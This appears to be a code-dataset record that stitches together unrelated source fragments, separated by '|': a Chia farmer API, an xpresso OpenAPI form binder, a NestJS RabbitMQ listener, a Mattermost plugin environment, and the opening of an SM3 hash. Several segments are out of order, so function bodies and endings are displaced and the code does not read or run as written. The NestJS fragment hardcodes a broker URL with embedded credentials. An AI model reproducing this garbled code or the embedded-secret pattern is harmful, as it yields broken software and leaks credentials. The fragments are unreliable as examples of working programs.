f"{new_proof_of_space.sp_hash}"
)
return None
if new_proof_of_space.sp_hash not in self.farmer.sps:
self.farmer.log.warning(
f"Received response for a signage point that we do not have {new_proof_of_space.sp_hash}"
)
return None
sps = self.farmer.sps[new_proof_of_space.sp_hash]
for sp in sps:
computed_quality_string = new_proof_of_space.proof.verify_and_get_quality_string(
self.farmer.constants,
new_proof_of_space.challenge_hash,
new_proof_of_space.sp_hash,
)
if computed_quality_string is None:
self.farmer.log.error(
f"Invalid proof of space {new_proof_of_space.proof}")
return None
self.farmer.number_of_responses[new_proof_of_space.sp_hash] += 1
required_iters: uint64 = calculate_iterations_quality(
self.farmer.constants.DIFFICULTY_CONSTANT_FACTOR,
computed_quality_string,
new_proof_of_space.proof.size,
sp.difficulty,
new_proof_of_space.sp_hash,
)
# If the iters are good enough to make a block, proceed with the block making flow
if required_iters < calculate_sp_interval_iters(self.farmer.constants, sp.sub_slot_iters):
# Proceed at getting the signatures for this PoSpace
request = harvester_protocol.RequestSignatures(
new_proof_of_space.plot_identifier,
new_proof_of_space.challenge_hash,
new_proof_of_space.sp_hash,
[sp.challenge_chain_sp, sp.reward_chain_sp],
)
if new_proof_of_space.sp_hash not in self.farmer.proofs_of_space:
self.farmer.proofs_of_space[new_proof_of_space.sp_hash] = [
]
self.farmer.proofs_of_space[new_proof_of_space.sp_hash].append(
(
new_proof_of_space.plot_identifier,
new_proof_of_space.proof,
)
)
self.farmer.cache_add_time[new_proof_of_space.sp_hash] = uint64(
int(time.time()))
self.farmer.quality_str_to_identifiers[computed_quality_string] = (
new_proof_of_space.plot_identifier,
new_proof_of_space.challenge_hash,
new_proof_of_space.sp_hash,
peer.peer_node_id,
)
self.farmer.cache_add_time[computed_quality_string] = uint64(
int(time.time()))
await peer.send_message(make_msg(ProtocolMessageTypes.request_signatures, request))
p2_singleton_puzzle_hash = new_proof_of_space.proof.pool_contract_puzzle_hash
if p2_singleton_puzzle_hash is not None:
# Otherwise, send the proof of space to the pool
# When we win a block, we also send the partial to the pool
if p2_singleton_puzzle_hash not in self.farmer.pool_state:
self.farmer.log.info(
f"Did not find pool info for {p2_singleton_puzzle_hash}")
return
pool_state_dict: Dict = self.farmer.pool_state[p2_singleton_puzzle_hash]
pool_url = pool_state_dict["pool_config"].pool_url
if pool_url == "":
return
if pool_state_dict["current_difficulty"] is None:
self.farmer.log.warning(
f"No pool specific difficulty has been set for {p2_singleton_puzzle_hash}, "
f"check communication with the pool, skipping this partial to {pool_url}."
)
return
required_iters = calculate_iterations_quality(
self.farmer.constants.DIFFICULTY_CONSTANT_FACTOR,
computed_quality_string,
new_proof_of_space.proof.size,
pool_state_dict["current_difficulty"],
new_proof_of_space.sp_hash,
)
if required_iters >= calculate_sp_interval_iters(
self.farmer.constants, self.farmer.constants.POOL_SUB_SLOT_ITERS
):
self.farmer.log.info(
f"Proof of space not good enough for pool {pool_url}: {pool_state_dict['current_difficulty']}"
)
return
authentication_token_timeout = pool_state_dict["authentication_token_timeout"]
if authentication_token_timeout is None:
self.farmer.log.warning(
f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}"
f", check communication with the pool."
)
return
# Submit partial to pool
is_eos = new_proof_of_space.signage_point_index == 0
payload = PostPartialPayload(
pool_state_dict["pool_config"].launcher_id,
get_current_authentication_token(
authentication_token_timeout),
new_proof_of_space.proof,
new_proof_of_space.sp_hash,
is_eos,
peer.peer_node_id,
)
# The plot key is 2/2 so we need the harvester's half of the signature
m_to_sign = payload.get_hash()
request = harvester_protocol.RequestSignatures(
new_proof_of_space.plot_identifier,
new_proof_of_space.challenge_hash,
new_proof_of_space.sp_hash,
[m_to_sign],
)
response: Any = await peer.request_signatures(request)
if not isinstance(response, harvester_protocol.RespondSignatures):
self.farmer.log.error(
f"Invalid response from harvester: {response}")
return
assert len(response.message_signatures) == 1
plot_signature: Optional[G2Element] = None
for sk in self.farmer.get_private_keys():
pk = sk.get_g1()
if pk == response.farmer_pk:
agg_pk = ProofOfSpace.generate_plot_public_key(
response.local_pk, pk, True)
assert agg_pk == new_proof_of_space.proof.plot_public_key
sig_farmer = AugSchemeMPL.sign(sk, m_to_sign, agg_pk)
taproot_sk: PrivateKey = ProofOfSpace.generate_taproot_sk(
response.local_pk, pk)
taproot_sig: G2Element = AugSchemeMPL.sign(
taproot_sk, m_to_sign, agg_pk)
plot_signature = AugSchemeMPL.aggregate(
[sig_farmer, response.message_signatures[0][1], taproot_sig]
)
assert AugSchemeMPL.verify(
agg_pk, m_to_sign, plot_signature)
authentication_pk = pool_state_dict["pool_config"].authentication_public_key
                if bytes(authentication_pk) not in self.farmer.authentication_keys:
                    self.farmer.log.error(
                        f"No authentication sk for {authentication_pk}")
                    return
authentication_sk: PrivateKey = self.farmer.authentication_keys[bytes(
authentication_pk)]
authentication_signature = AugSchemeMPL.sign(
authentication_sk, m_to_sign)
assert plot_signature is not None
agg_sig: G2Element = AugSchemeMPL.aggregate(
[plot_signature, authentication_signature])
post_partial_request: PostPartialRequest = PostPartialRequest(
payload, agg_sig)
post_partial_body = json.dumps(
post_partial_request.to_json_dict())
self.farmer.log.info(
f"Submitting partial for {post_partial_request.payload.launcher_id.hex()} to {pool_url}"
)
pool_state_dict["points_found_since_start"] += pool_state_dict["current_difficulty"]
pool_state_dict["points_found_24h"].append(
(time.time(), pool_state_dict["current_difficulty"]))
headers = {
"content-type": "application/json;",
}
try:
async with aiohttp.ClientSession() as session:
async with session.post(
f"{pool_url}/partial",
data=post_partial_body,
headers=headers,
ssl=ssl_context_for_root(get_mozilla_ca_crt()),
) as resp:
if resp.ok:
pool_response: Dict = json.loads(await resp.text())
self.farmer.log.info(
f"Pool response: {pool_response}")
if "error_code" in pool_response:
self.farmer.log.error(
f"Error in pooling: "
f"{pool_response['error_code'], pool_response['error_message']}"
)
pool_state_dict["pool_errors_24h"].append(
pool_response)
if pool_response["error_code"] == PoolErrorCode.PROOF_NOT_GOOD_ENOUGH.value:
self.farmer.log.error(
"Partial not good enough, forcing pool farmer update to "
"get our current difficulty."
)
pool_state_dict["next_farmer_update"] = 0
await self.farmer.update_pool_state()
else:
new_difficulty = pool_response["new_difficulty"]
pool_state_dict["points_acknowledged_since_start"] += new_difficulty
pool_state_dict["points_acknowledged_24h"].append(
(time.time(), new_difficulty))
pool_state_dict["current_difficulty"] = new_difficulty
else:
self.farmer.log.error(
f"Error sending partial to {pool_url}, {resp.status}")
except Exception as e:
self.farmer.log.error(f"Error connecting to pool: {e}")
return
return
@api_request
async def respond_signatures(self, response: harvester_protocol.RespondSignatures):
"""
There are two cases: receiving signatures for sps, or receiving signatures for the block.
"""
if response.sp_hash not in self.farmer.sps:
self.farmer.log.warning(
f"Do not have challenge hash {response.challenge_hash}")
return None
is_sp_signatures: bool = False
sps = self.farmer.sps[response.sp_hash]
signage_point_index = sps[0].signage_point_index
found_sp_hash_debug = False
for sp_candidate in sps:
if response.sp_hash == response.message_signatures[0][0]:
found_sp_hash_debug = True
if sp_candidate.reward_chain_sp == response.message_signatures[1][0]:
is_sp_signatures = True
if found_sp_hash_debug:
assert is_sp_signatures
pospace = None
for plot_identifier, candidate_pospace in self.farmer.proofs_of_space[response.sp_hash]:
if plot_identifier == response.plot_identifier:
pospace = candidate_pospace
assert pospace is not None
include_taproot: bool = pospace.pool_contract_puzzle_hash is not None
computed_quality_string = pospace.verify_and_get_quality_string(
self.farmer.constants, response.challenge_hash, response.sp_hash
)
if computed_quality_string is None:
self.farmer.log.warning(f"Have invalid PoSpace {pospace}")
return None
if is_sp_signatures:
(
challenge_chain_sp,
challenge_chain_sp_harv_sig,
) = response.message_signatures[0]
reward_chain_sp, reward_chain_sp_harv_sig = response.message_signatures[1]
for sk in self.farmer.get_private_keys():
pk = sk.get_g1()
if pk == response.farmer_pk:
agg_pk = ProofOfSpace.generate_plot_public_key(
response.local_pk, pk, include_taproot)
assert agg_pk == pospace.plot_public_key
if include_taproot:
taproot_sk: PrivateKey = ProofOfSpace.generate_taproot_sk(
response.local_pk, pk)
taproot_share_cc_sp: G2Element = AugSchemeMPL.sign(
taproot_sk, challenge_chain_sp, agg_pk)
taproot_share_rc_sp: G2Element = AugSchemeMPL.sign(
taproot_sk, reward_chain_sp, agg_pk)
else:
taproot_share_cc_sp = G2Element()
taproot_share_rc_sp = G2Element()
farmer_share_cc_sp = AugSchemeMPL.sign(
sk, challenge_chain_sp, agg_pk)
agg_sig_cc_sp = AugSchemeMPL.aggregate(
[challenge_chain_sp_harv_sig,
farmer_share_cc_sp, taproot_share_cc_sp]
)
assert AugSchemeMPL.verify(
agg_pk, challenge_chain_sp, agg_sig_cc_sp)
# This means it passes the sp filter
farmer_share_rc_sp = AugSchemeMPL.sign(
sk, reward_chain_sp, agg_pk)
agg_sig_rc_sp = AugSchemeMPL.aggregate(
[reward_chain_sp_harv_sig,
farmer_share_rc_sp, taproot_share_rc_sp]
)
assert AugSchemeMPL.verify(
agg_pk, reward_chain_sp, agg_sig_rc_sp)
if pospace.pool_public_key is not None:
assert pospace.pool_contract_puzzle_hash is None
pool_pk = bytes(pospace.pool_public_key)
if pool_pk not in self.farmer.pool_sks_map:
self.farmer.log.error(
f"Don't have the private key for the pool key used by harvester: {pool_pk.hex()}"
)
return None
pool_target: Optional[PoolTarget] = PoolTarget(
self.farmer.pool_target, uint32(0))
assert pool_target is not None
pool_target_signature: Optional[G2Element] = AugSchemeMPL.sign(
self.farmer.pool_sks_map[pool_pk], bytes(
pool_target)
)
else:
assert pospace.pool_contract_puzzle_hash is not None
pool_target = None
pool_target_signature = None
request = farmer_protocol.DeclareProofOfSpace(
response.challenge_hash,
challenge_chain_sp,
signage_point_index,
reward_chain_sp,
pospace,
agg_sig_cc_sp,
agg_sig_rc_sp,
self.farmer.farmer_target,
pool_target,
pool_target_signature,
)
self.farmer.state_changed(
"proof", {"proof": request, "passed_filter": True})
msg = make_msg(
ProtocolMessageTypes.declare_proof_of_space, request)
await self.farmer.server.send_to_all([msg], NodeType.FULL_NODE)
return None
else:
# This is a response with block signatures
for sk in self.farmer.get_private_keys():
(
foliage_block_data_hash,
foliage_sig_harvester,
) = response.message_signatures[0]
(
foliage_transaction_block_hash,
foliage_transaction_block_sig_harvester,
) = response.message_signatures[1]
pk = sk.get_g1()
if pk == response.farmer_pk:
agg_pk = ProofOfSpace.generate_plot_public_key(
response.local_pk, pk, include_taproot)
assert agg_pk == pospace.plot_public_key
if include_taproot:
taproot_sk = ProofOfSpace.generate_taproot_sk(
response.local_pk, pk)
foliage_sig_taproot: G2Element = AugSchemeMPL.sign(
taproot_sk, foliage_block_data_hash, agg_pk)
foliage_transaction_block_sig_taproot: G2Element = AugSchemeMPL.sign(
taproot_sk, foliage_transaction_block_hash, agg_pk
)
else:
foliage_sig_taproot = G2Element()
foliage_transaction_block_sig_taproot = G2Element()
foliage_sig_farmer = AugSchemeMPL.sign(
sk, foliage_block_data_hash, agg_pk)
foliage_transaction_block_sig_farmer = AugSchemeMPL.sign(
sk, foliage_transaction_block_hash, agg_pk)
foliage_agg_sig = AugSchemeMPL.aggregate(
[foliage_sig_harvester, foliage_sig_farmer,
foliage_sig_taproot]
)
foliage_block_agg_sig = AugSchemeMPL.aggregate(
[
foliage_transaction_block_sig_harvester,
foliage_transaction_block_sig_farmer,
foliage_transaction_block_sig_taproot,
]
)
assert AugSchemeMPL.verify(
agg_pk, foliage_block_data_hash, foliage_agg_sig)
assert AugSchemeMPL.verify(
agg_pk, foliage_transaction_block_hash, foliage_block_agg_sig)
request_to_nodes = farmer_protocol.SignedValues(
computed_quality_string,
foliage_agg_sig,
foliage_block_agg_sig,
)
msg = make_msg(
ProtocolMessageTypes.signed_values, request_to_nodes)
await self.farmer.server.send_to_all([msg], NodeType.FULL_NODE)
"""
FARMER PROTOCOL (FARMER <-> FULL NODE)
"""
@api_request
async def new_signage_point(self, new_signage_point: farmer_protocol.NewSignagePoint):
pool_difficulties: List[PoolDifficulty] = []
for p2_singleton_puzzle_hash, pool_dict in self.farmer.pool_state.items():
if pool_dict["pool_config"].pool_url == "":
# Self pooling
continue
if pool_dict["current_difficulty"] is None:
self.farmer.log.warning(
f"No pool specific difficulty has been set for {p2_singleton_puzzle_hash}, "
f"check communication with the pool, skipping this signage point, pool: "
f"{pool_dict['pool_config'].pool_url} "
)
continue
pool_difficulties.append(
PoolDifficulty(
pool_dict["current_difficulty"],
self.farmer.constants.POOL_SUB_SLOT_ITERS,
p2_singleton_puzzle_hash,
)
)
message = harvester_protocol.NewSignagePointHarvester(
new_signage_point.challenge_hash,
new_signage_point.difficulty,
new_signage_point.sub_slot_iters,
new_signage_point.signage_point_index,
new_signage_point.challenge_chain_sp,
pool_difficulties,
)
msg = make_msg(
ProtocolMessageTypes.new_signage_point_harvester, message)
await self.farmer.server.send_to_all([msg], NodeType.HARVESTER)
if new_signage_point.challenge_chain_sp not in self.farmer.sps:
self.farmer.sps[new_signage_point.challenge_chain_sp] = []
if new_signage_point in self.farmer.sps[new_signage_point.challenge_chain_sp]:
self.farmer.log.debug(
f"Duplicate signage point {new_signage_point.signage_point_index}")
return
self.farmer.sps[new_signage_point.challenge_chain_sp].append(
new_signage_point)
self.farmer.cache_add_time[new_signage_point.challenge_chain_sp] = uint64(
int(time.time()))
tStart = time.time()
self.farmer.lastChannageTime = int(round(tStart * 1000))
self.farmer.state_changed("new_signage_point", {
"sp_hash": new_signage_point.challenge_chain_sp})
@api_request
async def request_signed_values(self, full_node_request: farmer_protocol.RequestSignedValues):
if full_node_request.quality_string not in self.farmer.quality_str_to_identifiers:
self.farmer.log.error(
f"Do not have quality string {full_node_request.quality_string}")
return None
(plot_identifier, challenge_hash, sp_hash, node_id) = self.farmer.quality_str_to_identifiers[
full_node_request.quality_string
]
request = harvester_protocol.RequestSignatures(
plot_identifier,
challenge_hash,
sp_hash,
[full_node_request.foliage_block_data_hash,
full_node_request.foliage_transaction_block_hash],
)
msg = make_msg(ProtocolMessageTypes.request_signatures, request)
await self.farmer.server.send_to_specific([msg], node_id)
@api_request
async def farming_info(self, request: farmer_protocol.FarmingInfo):
timeConsuming = 999
tEnd = time.time()
timeConsuming = int(round(tEnd * 1000)) - self.farmer.lastChannageTime
self.farmer.state_changed(
"new_farming_info",
{
"farming_info": {
"challenge_hash": request.challenge_hash,
"signage_point": request.sp_hash,
"passed_filter": request.passed,
"proofs": request.proofs,
"total_plots": request.total_plots,
"timestamp": request.timestamp,
"timeconsuming": timeConsuming,
}
},
)
@api_request
async def respond_plots(self, _: harvester_protocol.RespondPlots):
self.farmer.log.warning("Respond plots came too late")
| FarmerAPI |
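The partial-submission path above hinges on one comparison: a proof qualifies for the pool only when its required iterations fall below the pool's signage-point interval. A stripped-down sketch of that check follows, using the same helpers the file imports; the constants object and difficulty value are placeholders supplied by the caller.
# Illustrative only: mirrors the pool-eligibility test inside new_proof_of_space.
def proof_qualifies_for_pool(constants, quality_string, plot_size, pool_difficulty, sp_hash):
    required_iters = calculate_iterations_quality(
        constants.DIFFICULTY_CONSTANT_FACTOR,
        quality_string,
        plot_size,
        pool_difficulty,
        sp_hash,
    )
    # Lower pool difficulty -> fewer required iterations -> more partials qualify.
    return required_iters < calculate_sp_interval_iters(constants, constants.POOL_SUB_SLOT_ITERS)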
form.py | import inspect
import sys
import typing
from dataclasses import dataclass
if sys.version_info < (3, 8):
from typing_extensions import Literal
else:
from typing import Literal
from di.typing import get_markers_from_parameter
from xpresso._utils.typing import model_field_from_param
from xpresso.binders._body.openapi.form_field import OpenAPIFormFieldMarker
from xpresso.binders._utils.examples import parse_examples
from xpresso.binders.api import ModelNameMap, OpenAPIBody, OpenAPIBodyMarker, Schemas
from xpresso.binders.dependants import BodyBinderMarker
from xpresso.openapi import models as openapi_models
@dataclass(frozen=True)
class OpenAPIFormDataBody(OpenAPIBody):
field_openapi_providers: typing.Mapping[str, OpenAPIBody]
required_fields: typing.List[str]
description: typing.Optional[str]
examples: typing.Optional[typing.Mapping[str, openapi_models.Example]]
media_type: Literal[
"multipart/form-data",
"application/x-www-form-urlencoded",
]
required: bool
nullable: bool
include_in_schema: bool
def get_models(self) -> typing.List[type]:
return [
model
for provider in self.field_openapi_providers.values()
for model in provider.get_models()
]
def get_schema(
self, model_name_map: ModelNameMap, schemas: Schemas
) -> openapi_models.Schema:
properties = {
field_name: field_openapi.get_schema(
model_name_map=model_name_map, schemas=schemas
)
for field_name, field_openapi in self.field_openapi_providers.items()
}
return openapi_models.Schema(
type="object",
properties=properties,
required=self.required_fields or None,
nullable=self.nullable or None,
)
def get_openapi_media_type(
self, model_name_map: ModelNameMap, schemas: Schemas
) -> openapi_models.MediaType:
encodings: typing.Dict[str, openapi_models.Encoding] = {}
for field_name, field_openapi in self.field_openapi_providers.items():
encoding = field_openapi.get_encoding()
if encoding:
encodings[field_name] = encoding
return openapi_models.MediaType(
schema=self.get_schema(model_name_map=model_name_map, schemas=schemas),
examples=self.examples, # type: ignore[arg-type]
encoding=encodings or None,
)
def get_media_type_string(self) -> str:
return self.media_type
def get_openapi(
self, model_name_map: ModelNameMap, schemas: Schemas
) -> openapi_models.RequestBody:
|
@dataclass(frozen=True)
class OpenAPIFormDataMarker(OpenAPIBodyMarker):
description: typing.Optional[str]
examples: typing.Optional[
typing.Dict[str, typing.Union[openapi_models.Example, typing.Any]]
]
media_type: Literal[
"multipart/form-data",
"application/x-www-form-urlencoded",
]
include_in_schema: bool
def register_parameter(self, param: inspect.Parameter) -> OpenAPIBody:
form_data_field = model_field_from_param(param)
if form_data_field.required is False:
required = False
else:
required = True
field_openapi_providers: typing.Dict[str, OpenAPIBody] = {}
required_fields: typing.List[str] = []
# use pydantic to get rid of outer annotated, optional, etc.
annotation = form_data_field.type_
for field_param in inspect.signature(annotation).parameters.values():
marker: typing.Optional[BodyBinderMarker] = None
for param_marker in get_markers_from_parameter(field_param):
if isinstance(param_marker, BodyBinderMarker):
marker = param_marker
break
field_openapi: OpenAPIBodyMarker
if marker is None:
# use the defaults
field_openapi = OpenAPIFormFieldMarker(
alias=None,
style="form",
explode=True,
include_in_schema=True,
)
else:
field_openapi = marker.openapi_marker
provider = field_openapi.register_parameter(field_param)
field_name = provider.get_field_name()
if provider.include_in_schema:
field_openapi_providers[field_name] = provider
field = model_field_from_param(field_param)
if field.required is not False:
required_fields.append(field_name)
examples = parse_examples(self.examples) if self.examples else None
return OpenAPIFormDataBody(
field_openapi_providers=field_openapi_providers,
required_fields=required_fields,
description=self.description,
examples=examples,
media_type=self.media_type,
required=required,
nullable=form_data_field.allow_none,
include_in_schema=self.include_in_schema,
)
| return openapi_models.RequestBody(
description=self.description,
required=self.required,
content={
self.get_media_type_string(): self.get_openapi_media_type(
model_name_map, schemas
)
},
) |
listener.ts | import { NestFactory } from '@nestjs/core';
import { Transport } from '@nestjs/microservices';
import { AppModule } from './app.module';
async function bootstrap() {
const app = await NestFactory.createMicroservice(AppModule, {
transport: Transport.RMQ,
options: {
urls: [
'amqps://xpsgnyxv:[email protected]/xpsgnyxv',
],
queue: 'main_queue',
queueOptions: {
durable: false,
},
},
}); | console.log('microservice is running');
}
bootstrap(); |
app.listen(); |
environment.go | // Copyright (c) 2015-present Mattermost, Inc. All Rights Reserved.
// See License.txt for license information.
// Package pluginenv provides high level functionality for discovering and launching plugins.
package pluginenv
import (
"fmt"
"io/ioutil"
"net/http"
"path/filepath"
"sync"
"github.com/pkg/errors"
"github.com/mattermost/mattermost-server/model"
"github.com/mattermost/mattermost-server/plugin"
)
type APIProviderFunc func(*model.Manifest) (plugin.API, error)
type SupervisorProviderFunc func(*model.BundleInfo) (plugin.Supervisor, error)
type ActivePlugin struct {
BundleInfo *model.BundleInfo
Supervisor plugin.Supervisor
}
// Environment represents an environment that plugins are discovered and launched in.
type Environment struct {
searchPath string
webappPath string
apiProvider APIProviderFunc
supervisorProvider SupervisorProviderFunc
activePlugins map[string]ActivePlugin
mutex sync.RWMutex
}
type Option func(*Environment)
// Creates a new environment. At a minimum, the APIProvider and SearchPath options are required.
func New(options ...Option) (*Environment, error) { | opt(env)
}
if env.supervisorProvider == nil {
env.supervisorProvider = DefaultSupervisorProvider
}
if env.searchPath == "" {
return nil, fmt.Errorf("a search path must be provided")
}
return env, nil
}
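// Illustrative sketch (not part of the original file): constructing an Environment with
// inline Option closures. The package's real option constructors are not shown in this
// excerpt, so this sketch sets the unexported fields directly, which works within the package.
func exampleEnvironmentSetup(api plugin.API) (*Environment, error) {
	return New(
		func(env *Environment) { env.searchPath = "./plugins" },
		func(env *Environment) { env.webappPath = "./client/plugins" },
		func(env *Environment) {
			env.apiProvider = func(*model.Manifest) (plugin.API, error) { return api, nil }
		},
	)
}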
// Returns the configured webapp path.
func (env *Environment) WebappPath() string {
return env.webappPath
}
// Returns the configured search path.
func (env *Environment) SearchPath() string {
return env.searchPath
}
// Returns a list of all plugins found within the environment.
func (env *Environment) Plugins() ([]*model.BundleInfo, error) {
return ScanSearchPath(env.searchPath)
}
// Returns a list of all currently active plugins within the environment.
func (env *Environment) ActivePlugins() []*model.BundleInfo {
env.mutex.RLock()
defer env.mutex.RUnlock()
activePlugins := []*model.BundleInfo{}
for _, p := range env.activePlugins {
activePlugins = append(activePlugins, p.BundleInfo)
}
return activePlugins
}
// Returns the ids of the currently active plugins.
func (env *Environment) ActivePluginIds() (ids []string) {
env.mutex.RLock()
defer env.mutex.RUnlock()
for id := range env.activePlugins {
ids = append(ids, id)
}
return
}
// Returns true if the plugin is active, false otherwise.
func (env *Environment) IsPluginActive(pluginId string) bool {
env.mutex.RLock()
defer env.mutex.RUnlock()
for id := range env.activePlugins {
if id == pluginId {
return true
}
}
return false
}
// Activates the plugin with the given id.
func (env *Environment) ActivatePlugin(id string, onError func(error)) error {
env.mutex.Lock()
defer env.mutex.Unlock()
if !plugin.IsValidId(id) {
return fmt.Errorf("invalid plugin id: %s", id)
}
if _, ok := env.activePlugins[id]; ok {
return fmt.Errorf("plugin already active: %v", id)
}
plugins, err := ScanSearchPath(env.searchPath)
if err != nil {
return err
}
var bundle *model.BundleInfo
for _, p := range plugins {
if p.Manifest != nil && p.Manifest.Id == id {
if bundle != nil {
return fmt.Errorf("multiple plugins found: %v", id)
}
bundle = p
}
}
if bundle == nil {
return fmt.Errorf("plugin not found: %v", id)
}
activePlugin := ActivePlugin{BundleInfo: bundle}
var supervisor plugin.Supervisor
if bundle.Manifest.Backend != nil {
if env.apiProvider == nil {
return fmt.Errorf("env missing api provider, cannot activate plugin: %v", id)
}
supervisor, err = env.supervisorProvider(bundle)
if err != nil {
return errors.Wrapf(err, "unable to create supervisor for plugin: %v", id)
}
api, err := env.apiProvider(bundle.Manifest)
if err != nil {
return errors.Wrapf(err, "unable to get api for plugin: %v", id)
}
if err := supervisor.Start(api); err != nil {
return errors.Wrapf(err, "unable to start plugin: %v", id)
}
if onError != nil {
go func() {
err := supervisor.Wait()
if err != nil {
onError(err)
}
}()
}
activePlugin.Supervisor = supervisor
}
if bundle.Manifest.Webapp != nil {
if env.webappPath == "" {
if supervisor != nil {
supervisor.Stop()
}
return fmt.Errorf("env missing webapp path, cannot activate plugin: %v", id)
}
bundlePath := filepath.Clean(bundle.Manifest.Webapp.BundlePath)
if bundlePath == "" || bundlePath[0] == '.' {
return fmt.Errorf("invalid webapp bundle path")
}
bundlePath = filepath.Join(env.searchPath, id, bundlePath)
webappBundle, err := ioutil.ReadFile(bundlePath)
if err != nil {
// Backwards compatibility for plugins where webapp.bundle_path was ignored. This should
// be removed eventually.
if webappBundle2, err2 := ioutil.ReadFile(fmt.Sprintf("%s/%s/webapp/%s_bundle.js", env.searchPath, id, id)); err2 == nil {
webappBundle = webappBundle2
} else {
if supervisor != nil {
supervisor.Stop()
}
return errors.Wrapf(err, "unable to read webapp bundle: %v", id)
}
}
err = ioutil.WriteFile(fmt.Sprintf("%s/%s_bundle.js", env.webappPath, id), webappBundle, 0644)
if err != nil {
if supervisor != nil {
supervisor.Stop()
}
return errors.Wrapf(err, "unable to write webapp bundle: %v", id)
}
}
env.activePlugins[id] = activePlugin
return nil
}
// Deactivates the plugin with the given id.
func (env *Environment) DeactivatePlugin(id string) error {
env.mutex.Lock()
defer env.mutex.Unlock()
if activePlugin, ok := env.activePlugins[id]; !ok {
return fmt.Errorf("plugin not active: %v", id)
} else {
delete(env.activePlugins, id)
var err error
if activePlugin.Supervisor != nil {
err = activePlugin.Supervisor.Hooks().OnDeactivate()
if serr := activePlugin.Supervisor.Stop(); err == nil {
err = serr
}
}
return err
}
}
// Deactivates all plugins and gracefully shuts down the environment.
func (env *Environment) Shutdown() (errs []error) {
env.mutex.Lock()
defer env.mutex.Unlock()
for _, activePlugin := range env.activePlugins {
if activePlugin.Supervisor != nil {
if err := activePlugin.Supervisor.Hooks().OnDeactivate(); err != nil {
errs = append(errs, errors.Wrapf(err, "OnDeactivate() error for %v", activePlugin.BundleInfo.Manifest.Id))
}
if err := activePlugin.Supervisor.Stop(); err != nil {
errs = append(errs, errors.Wrapf(err, "error stopping supervisor for %v", activePlugin.BundleInfo.Manifest.Id))
}
}
}
env.activePlugins = make(map[string]ActivePlugin)
return
}
type MultiPluginHooks struct {
env *Environment
}
type SinglePluginHooks struct {
env *Environment
pluginId string
}
func (env *Environment) Hooks() *MultiPluginHooks {
return &MultiPluginHooks{
env: env,
}
}
func (env *Environment) HooksForPlugin(id string) *SinglePluginHooks {
return &SinglePluginHooks{
env: env,
pluginId: id,
}
}
func (h *MultiPluginHooks) invoke(f func(plugin.Hooks) error) (errs []error) {
h.env.mutex.RLock()
defer h.env.mutex.RUnlock()
for _, activePlugin := range h.env.activePlugins {
if activePlugin.Supervisor == nil {
continue
}
if err := f(activePlugin.Supervisor.Hooks()); err != nil {
errs = append(errs, errors.Wrapf(err, "hook error for %v", activePlugin.BundleInfo.Manifest.Id))
}
}
return
}
// OnConfigurationChange invokes the OnConfigurationChange hook for all plugins. Any errors
// encountered will be returned.
func (h *MultiPluginHooks) OnConfigurationChange() []error {
return h.invoke(func(hooks plugin.Hooks) error {
if err := hooks.OnConfigurationChange(); err != nil {
return errors.Wrapf(err, "error calling OnConfigurationChange hook")
}
return nil
})
}
// ServeHTTP invokes the ServeHTTP hook for the plugin identified by the request or responds with a
// 404 not found.
//
// It expects the request's context to have a plugin_id set.
func (h *MultiPluginHooks) ServeHTTP(w http.ResponseWriter, r *http.Request) {
if id := r.Context().Value("plugin_id"); id != nil {
if idstr, ok := id.(string); ok {
h.env.mutex.RLock()
defer h.env.mutex.RUnlock()
if plugin, ok := h.env.activePlugins[idstr]; ok && plugin.Supervisor != nil {
plugin.Supervisor.Hooks().ServeHTTP(w, r)
return
}
}
}
http.NotFound(w, r)
}
// MessageWillBePosted invokes the MessageWillBePosted hook for all plugins. Ordering
// is not guaranteed and the next plugin will get the previous one's modifications.
// if a plugin rejects a post, the rest of the plugins will not know that an attempt was made.
// Returns the final result post, or nil if the post was rejected and a string with a reason
// for the user the message was rejected.
func (h *MultiPluginHooks) MessageWillBePosted(post *model.Post) (*model.Post, string) {
h.env.mutex.RLock()
defer h.env.mutex.RUnlock()
for _, activePlugin := range h.env.activePlugins {
if activePlugin.Supervisor == nil {
continue
}
var rejectionReason string
post, rejectionReason = activePlugin.Supervisor.Hooks().MessageWillBePosted(post)
if post == nil {
return nil, rejectionReason
}
}
return post, ""
}
// MessageWillBeUpdated invokes the MessageWillBeUpdated hook for all plugins. Ordering
// is not guaranteed and the next plugin will get the previous one's modifications.
// if a plugin rejects a post, the rest of the plugins will not know that an attempt was made.
// Returns the final result post, or nil if the post was rejected and a string with a reason
// for the user the message was rejected.
func (h *MultiPluginHooks) MessageWillBeUpdated(newPost, oldPost *model.Post) (*model.Post, string) {
h.env.mutex.RLock()
defer h.env.mutex.RUnlock()
post := newPost
for _, activePlugin := range h.env.activePlugins {
if activePlugin.Supervisor == nil {
continue
}
var rejectionReason string
post, rejectionReason = activePlugin.Supervisor.Hooks().MessageWillBeUpdated(post, oldPost)
if post == nil {
return nil, rejectionReason
}
}
return post, ""
}
func (h *MultiPluginHooks) MessageHasBeenPosted(post *model.Post) {
h.invoke(func(hooks plugin.Hooks) error {
hooks.MessageHasBeenPosted(post)
return nil
})
}
func (h *MultiPluginHooks) MessageHasBeenUpdated(newPost, oldPost *model.Post) {
h.invoke(func(hooks plugin.Hooks) error {
hooks.MessageHasBeenUpdated(newPost, oldPost)
return nil
})
}
func (h *SinglePluginHooks) invoke(f func(plugin.Hooks) error) error {
h.env.mutex.RLock()
defer h.env.mutex.RUnlock()
if activePlugin, ok := h.env.activePlugins[h.pluginId]; ok && activePlugin.Supervisor != nil {
if err := f(activePlugin.Supervisor.Hooks()); err != nil {
return errors.Wrapf(err, "hook error for plugin: %v", activePlugin.BundleInfo.Manifest.Id)
}
return nil
}
return fmt.Errorf("unable to invoke hook for plugin: %v", h.pluginId)
}
// ExecuteCommand invokes the ExecuteCommand hook for the plugin.
func (h *SinglePluginHooks) ExecuteCommand(args *model.CommandArgs) (resp *model.CommandResponse, appErr *model.AppError, err error) {
err = h.invoke(func(hooks plugin.Hooks) error {
resp, appErr = hooks.ExecuteCommand(args)
return nil
})
return
} | env := &Environment{
activePlugins: make(map[string]ActivePlugin),
}
for _, opt := range options { |
sm3.go | package sm3
import (
"encoding/binary"
"hash"
)
type SM3 struct {
digest [8]uint32
length uint64
unhandleMsg []byte
}
func (sm3 *SM3) ff0(x, y, z uint32) uint32 { return x ^ y ^ z }
func (sm3 *SM3) ff1(x, y, z uint32) uint32 { return (x & y) | (x & z) | (y & z) }
func (sm3 *SM3) gg0(x, y, z uint32) uint32 { return x ^ y ^ z }
func (sm3 *SM3) gg1(x, y, z uint32) uint32 { return (x & y) | (^x & z) }
